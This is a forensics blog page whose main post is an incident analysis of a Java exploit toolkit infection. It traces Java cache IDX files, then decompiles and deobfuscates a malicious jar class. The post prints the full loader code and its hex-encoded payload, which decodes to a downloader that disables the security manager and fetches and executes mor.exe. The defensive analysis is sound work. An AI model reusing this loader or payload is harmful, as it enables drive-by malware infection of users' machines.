I'm not a programmer by any means so I do my best with my coding but if anybody has any views on some improvements for performance or bugs then let me know. I'm not sure whether its possible to have an IDX file without any of the values i'm looking for so potentially if you have any idx files that don't have a date listed within them then my script will most likely fail. I've also added in some examples of what the output looks like within the script but I'll list them here also to highlight some examples.


Also to note in regards to IDX files there are typically two timestamps within an IDX file. One is listed as date and one is listed as last modified. In this instance I'm using the "date" to produce the TLN value as from what I've seen this seems to be the time the incident occurred.

Let me know if you find this script of value and if you find any bugs. As mentioned I'll hopefully upload the script to my own Google Code repository shortly and I'll let you all know when that is available in case you're having any troubles getting it to work for you.

Thursday, 9 August 2012

Java Exploit Toolkits - Part 2: Deobfuscating Java Exploit Toolkits

Lets continue with Part 2 of the series on Java Exploit Toolkits. The following post will be a beginners attempt to deobfuscate an obfuscated jar file (what a tongue twister) and I hope that by posting my attempt others may be able to comment on some more efficient ways to conduct this deobfuscation.

The reason why I posted Part 1 of this series was that this particular incident was very similar. It was only due to my experience in my previous incident that I was able to quickly identify artifacts of interest in the incident I will now discuss.

Again I received an image of a machine and was notified that antivirus had detected the following file

 Trojan.FakeAV - C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n  

I immediately noticed the similarity between this incident and my previous incident. I decided to start with the event logs again however in this instance I found one single entry and no tamper protection events as I had in Part 1

 Security Risk Found!Trojan.FakeAV in File: C:\Documents and Settings\username\Local Settings\Application Data\{762f1d12-0d4c-e201-bd96-7cb3501bb3b0}\n by: Auto-Protect scan. Action: Cleaned by Deletion. Action Description: The file was deleted successfully.   

I decided that the next logical step would be creating the directory listing and reviewing what occurred around the time of the alert. Reviewing the directory listing I did not find any artifacts of interest. Due to my knowledge of the previous incident I decided to search for .idx files within the directory listing and I found the following

 -A------- 2012-08-07 14:39:00.704 2012-08-07 14:38:57.986 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\lastAccessed  
 -A------- 2012-08-07 14:39:00.689 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468.idx  
 -A------- 2012-08-07 14:39:00.673 2012-08-07 14:39:00.658 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\74367697-78280468  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\..  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23\.  
 D-------- 2012-08-07 14:39:00.673 2012-08-07 14:38:49.79 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\23  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\..  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\.  
 D-------- 2012-08-07 14:38:57.986 2012-08-07 14:38:48.954 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0  
 -A------- 2012-08-07 14:38:57.954 2012-08-07 14:38:56.908 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245.idx  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\..  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\.  
 D-------- 2012-08-07 14:38:57.470 2012-08-07 14:38:49.236 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57  
 -A------- 2012-08-07 14:38:57.454 2012-08-07 14:38:57.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\57\bffc1b9-44cf1245  
 -A------- 2012-08-07 14:38:55.64 2012-08-07 14:38:55.64 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\c312ea1-3e1f76dc.hst  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\..  
 D-------- 2012-08-07 14:38:55.64 2012-08-07 14:38:48.970 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\cache\6.0\host\.  
 -A------- 2012-08-07 14:38:50.892 2012-08-07 14:38:48.673 c:\Documents and Settings\username\Application Data\Sun\Java\Deployment\  
 -A------- 2012-08-07 14:38:50.829 2012-08-07 14:38:50.829 c:\Documents and Settings\username\Local Settings\Temp\java_install_reg.log  

At this point I wasn't sure whether the following idx files were part of the incident but I decided, based on the previous incident, that they might be a good place to start.



At this point the URLs discovered in these files definitely looked suspicious but I still needed more information to decide. I decided the next step was to start looking at some of the other files that I've highlighted in orange above


I exported the file listed above and uploaded it to virus total. Here are the results. Although there were only 3 hits that was enough for me to gather further suspicion of the files. I renamed the file and added the .jar extension and attempted to open this file with jd-gui. Unfortunately I didn't have any success. I also attempted to rename the file to .exe and run it through Anubis but I wasn't able to do that either. At this point I wasn't really sure what my next step could be with the file so I decided to move on and focus on one of the other files. If anybody has any advice on this file i'd be keen to hear what my next steps might be.


Again I uploaded the file listed above to virus total to confirm any detections. Here are the results. At this point I was fairly sure that I'd identified the initial infection vector. Once again I added the .jar extension to the file and attempted to open it with jd-gui, SUCCESS! Here is the initial view I had when opening the file in jd-gui

I reviewed each of the classes above. The first two basically seemed like obfuscation and padding techniques to avoid antivirus so I decided to spend my time focusing on 03. Below is what I reviewed when opening 03

 import java.lang.reflect.Method;  
 class O3 extends ClassLoader  
  static ProtectionDomain pd;  
  public static char char_at(String paramString, int paramInt)  
   return paramString.charAt(paramInt);  
  public static Method get_func(Class paramClass) throws Exception  
   return paramClass.getClass().getMethod("newInstance", new Class[0]);  
  public static void invoke(Method paramMethod, Class paramClass) throws Exception  
   paramMethod.invoke(paramClass, new Object[0]);  
  public static String get_perm_name()  
   return new StringBuffer("setSec").toString() + "urityManager";  
  public static byte[] string_to_bytes(String paramString)  
   byte[] arrayOfByte = new byte[paramString.length() / 2];  
    Permissions localPermissions = new Permissions();  
    localPermissions.add(new RuntimePermission(get_perm_name()));  
    pd = new ProtectionDomain(new CodeSource(new URL(new StringBuffer("file:").toString() + "///"), new Certificate[0]), localPermissions);  
   catch (Exception localException) {  
   int i = paramString.length();  
   for (int j = 0; j < i; j += 2)  
    int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
    k = (k - 3) % 256;  
    arrayOfByte[(j / 2)] = (byte)k;  
   return arrayOfByte;  
  public static void load(O3 paramO3)  
    int i = 1;  
    String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };  
    StringBuilder localStringBuilder = new StringBuilder();  
    for (int j = 0; j < arrayOfString.length; j++)  
    byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
    Class localClass = paramO3.defineClass(null, arrayOfByte, 0, arrayOfByte.length, pd);  
    invoke(get_func(localClass), localClass);  
   catch (Exception localException)  

Basically from what I can gather from this Class file was that it creates an array of strings which i've highlighted in red. It then sends this array to the public static byte[] string_to_bytes(String paramString)  method which attempts to deobfuscate the code. At this point I was pretty lost as I wanted to attempt to deobfuscate the string in hope that it might provide me with a better understanding and potentially some new artifacts to search for within my image.

I decided to create my own java application based on the application above. It would be a good chance for me to dust off some of my Java skills that I'd so happily left in the past. I installed the Java JDK and then downloaded the Eclipse IDE which I was familar with.

I created the following Class based on the output of the above, again this is where I'm sure there are more efficient ways of doing this. My aim was to create a text file which listed the deobfuscated text within it. My class is as follows:

 import java.lang.reflect.Method;  
 public class exploitMain {  
    * @param args  
   public static void main(String[] args) {  
   public static char char_at(String paramString, int paramInt)  
     return paramString.charAt(paramInt);  
   public static byte[] string_to_bytes(String paramString)  
     byte[] arrayOfByte = new byte[paramString.length() / 2];  
     int i = paramString.length();  
     for (int j = 0; j < i; j += 2)  
      int k = (Character.digit(char_at(paramString, j), 16) << 4) + Character.digit(char_at(paramString, j + 1), 16);  
      k = (k - 3) % 256;  
      arrayOfByte[(j / 2)] = (byte)k;  
     return arrayOfByte;  
    public static void load()  
       int i = 1;  
       String[] arrayOfString = { "CD01BDC10303033303810D032A03350D033603370A03380D0339033A0B033B0B033C0D0339033D0A033E0A033F0B03400D034103420D030C03430D030C03440D030B03450A03460A03470A03480D031403350B03490D0339034A0D0314034B0B034C0D0314034D0D031303430D0312034E0D030B034F0B03500D035103520B03530B03540B03550D031203560D030B03570D031203570D035803590D0358035A0A035B0A035C0A035D0A035E0403093F6C716C77410403062B2C59040307467267680403124F6C71685178706568755764656F680403067578710403172B2C4F6D647964326F64716A3252656D6866773E04030D487B666873776C72717604030D567278756668496C6F6804030B464F37316D6479640F032C032D0A035F0F0360036104032A6D6479643276686678756C777C3253756C796C6F686A68674466776C7271487B666873776C72710A03620F036303640403116B777773316E686873646F6C796804030869646F76680F0365036604031E6D647964326C723245786969687568674C7173787756777568647004030F6D647964327168773258554F040403", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "2323232323232323232323232323232323232323232323232323232323232323", "23232323232323232323232323232323232323234B5757733D32327A7A7A3170", "6C716873666C31737572325337694F456C774D30537B4E35327C58443B367048", "0A03670F036803690F032C036A0F036B036C0F032C036D04031F6D647964326C7232457869696875686752787773787756777568647004031B6D647964326C7232496C6F685278777378775677756864700403196D647964326F64716A325677756C716A457869696875040307574850530F036E036F0F0370037104030B3270727531687B680F037203690F032C03730F03740375040308", "333333373A", "0A03760F03770378040308", "3333343439", "040308", "3333343533", "040308", "3333333A37", "0F0379037A0F037B032D0A037C0F037D037E0F037F03800403166D647964326F64716A32487B666873776C7271040306464F370403136D647964326F64716A3252656D68667704032A6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72710403216D6479643276686678756C777C324466666876764672717775726F6F687504030F677253756C796C6F686A68670403402B4F6D6479643276686678756C777C3253756C796C6F686A6867487B666873776C72714466776C72713E2C4F6D647964326F64716A3252656D6866773E0403136D647964326F64716A32567C7677687004031576687756686678756C777C506471646A68750403212B4F6D647964326F64716A3256686678756C777C506471646A68753E2C5904030E766877537572736875777C04033B2B4F6D647964326F64716A325677756C716A3E4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E0403136D647964326F64716A325677756C716A04030777756C700403172B2C4F6D647964326F64716A325677756C716A3E0403182B4F6D647964326F64716A325677756C716A3E2C5904030D7273687156777568647004031A2B2C4F6D647964326C72324C717378775677756864703E04031B2B4F6D647964326C72324C717378775677756864703E2C590403096A68776871790403292B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A3E04030964737368716704032F2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A325677756C716A4578696968753E04030B77725677756C716A04031D2B4F6D647964326C72325278777378775677756864703E4C2C590403077568646704030A2B5E454C4C2C4C0403146D647964326F64716A324C7177686A687504030B73647576684C71770403182B4F6D647964326F64716A325677756C716A3E2C4C0403087A756C776804030A2B5E454C4C2C59040308666F7276680403146D647964326F64716A32557871776C706804030D6A6877557871776C70680403182B2C4F6D647964326F64716A32557871776C70683E040307687B686604032A2B4F6D647964326F64716A325677756C716A3E2C4F6D647964326F64716A32537572666876763E03240329032A0304032B030303050304032C032D0304032E0303034103040305030303112DBA03042DBB03055AAA03074FB403040307030C030F03060304032F0303031903080303030C0307030F030C0314030F0311031003150304033003310305032E030304B10309030A0303042904BB0307140703BF0B4F0640064115081509BB030A5ABE030B5CBE030C5C150DB9030EBA030FB90310BA03113D07BE03125CBE03135CBE03145CBA03151516BB0317B903181519B90318B9031ABA031B140703BA031C3D081C072E06140703B9031D5C409E0393201F634106390918091FA5037B201F67180963141303A40309AA036C201F671809630A739D03162E18095F36151EBB031F859457AA034B201F671809630A7307A303162E18095F361520BB031F859457AA032F201F671809630A7308A303162E18095F361521BB031F859457AA03132E18095F361522BB031F859457870904AA028B1C082E061FB90323AA026A1C07B903241C08B90325BB03263D091C09BE03145CBA03151516BB0317B903181519B90318B9031AB903275AAA03074F04B3030403070423042603280304032F03030371031E030303190307031C030D031D0311031F0319032003310321035B0322036A0324036E032503770327038303290386032B0391032D03A1032F03AD033103BD033303C9033503D9033903E6032503EC033C03F7033E03FC033F03010340040603410423034604260343042703470332030303070304032803040333030303050334" };  
       StringBuilder localStringBuilder = new StringBuilder();  
       for (int j = 0; j < arrayOfString.length; j++)  
       byte[] arrayOfByte = string_to_bytes(localStringBuilder.toString());  
       String temp = new String();  
       temp = bytesToStringUTFCustom(arrayOfByte);  
     catch (Exception localException)  
    public static String bytesToStringUTFCustom(byte[] bytes) {  
      char[] buffer = new char[bytes.length];  
      for(int i=0;i < bytes.length;i++){  
      return new String(buffer);  
    public static void writeToText(String output) throws IOException {  
      File file = new File("c:/output.txt");  
      BufferedWriter bo = new BufferedWriter(new FileWriter(file));  

It was rushed so its fairly messy and I haven't commented on it. If you want to know anything further about it please feel free to leave some comments and I'll get back to you as soon as I can. Finally I reviewed my text  file for further information.

 ????  0 ~  
  ' 2  
  3 4  5  
  6 7  8  9  
  6 :  ;  <  =  
  > ?  
    B  C  D  E  
    2  F  
  6 G  
    H  I  
    L  M  
  N O  P  Q  R  
  U V  
  U W  X  Y  Z  [   <init>   ()V   Code   LineNumberTable   run   ()Ljava/lang/Object;    
 SourceFile  ) *  \  ] ^  'java/security/PrivilegedActionException  _  ` a   http.keepalive   false  b c   java/io/BufferedInputStream   java/net/URL                                                                                                             HTTp://  d  e f  ) g  h i  ) j   java/io/BufferedOutputStream   java/io/FileOutputStream   java/lang/StringBuffer   TEMP  k l  m n   /mor.exe  o f  ) p  q r   00047  s  t u   00116   00120   00074  v w  x *  y  z {  | }   java/lang/Exception   CL4   java/lang/Object  'java/security/PrivilegedExceptionAction   java/security/AccessController   doPrivileged  =(Ljava/security/PrivilegedExceptionAction;)Ljava/lang/Object;   java/lang/System   setSecurityManager   (Ljava/lang/SecurityManager;)V   setProperty  8(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;   java/lang/String   trim   ()Ljava/lang/String;   (Ljava/lang/String;)V    
 openStream   ()Ljava/io/InputStream;   (Ljava/io/InputStream;)V   getenv  &(Ljava/lang/String;)Ljava/lang/String;   append  ,(Ljava/lang/String;)Ljava/lang/StringBuffer;   toString   (Ljava/io/OutputStream;I)V   read   ([BII)I   java/lang/Integer   parseInt   (Ljava/lang/String;)I   write   ([BII)V   close   java/lang/Runtime    
 getRuntime   ()Ljava/lang/Runtime;   exec  '(Ljava/lang/String;)Ljava/lang/Process; ! & '   (      ) *   +  >       *?  *?  W?  L?                 ,                               
      - .   +  ?      & ?     ? L = >    ?  W?  Y?      Y   
 ?  ?  ?   
 ?  : ?  Y?  Y?  Y?    ?  ?    ?  ?  ?     ?  :   +    ?  Y=? ?  `> 6    ? x  d  `   ?  ? i  d  ` p?  +  \3  ?  ??T? H  d  ` p ?  +  \3  ?  ??T? ,  d  ` p ?  +  \3  ?  ??T?  +  \3  ?  ??T?  ???  +  ? ??g  ? !  ? "? #:   ?  Y?    ?  ?    ?  ?  ? $W?  L ?       # %   ,  n            
            .   X   g ! k " t $ ? & ? ( ? * ? , ? . ? 0 ? 2 ? 6 ? " ? 9 ? ; ? < ? =   >  C # @ $ D /      %   0    1  

Its difficult to make this output easy to read. I've highlighted the areas of interest in red. In particular it shows an additional file and the URL with the same site we'd previously discovered. Overall I was fairly happy to find an additional artifact to search for which unfortunately I did not  find in this instance.

I hope you find this to be useful and hopefully some of you may comment on more efficient ways of doing what i've done above. Would love to gather any advice from anyone that does this on a more regular basis.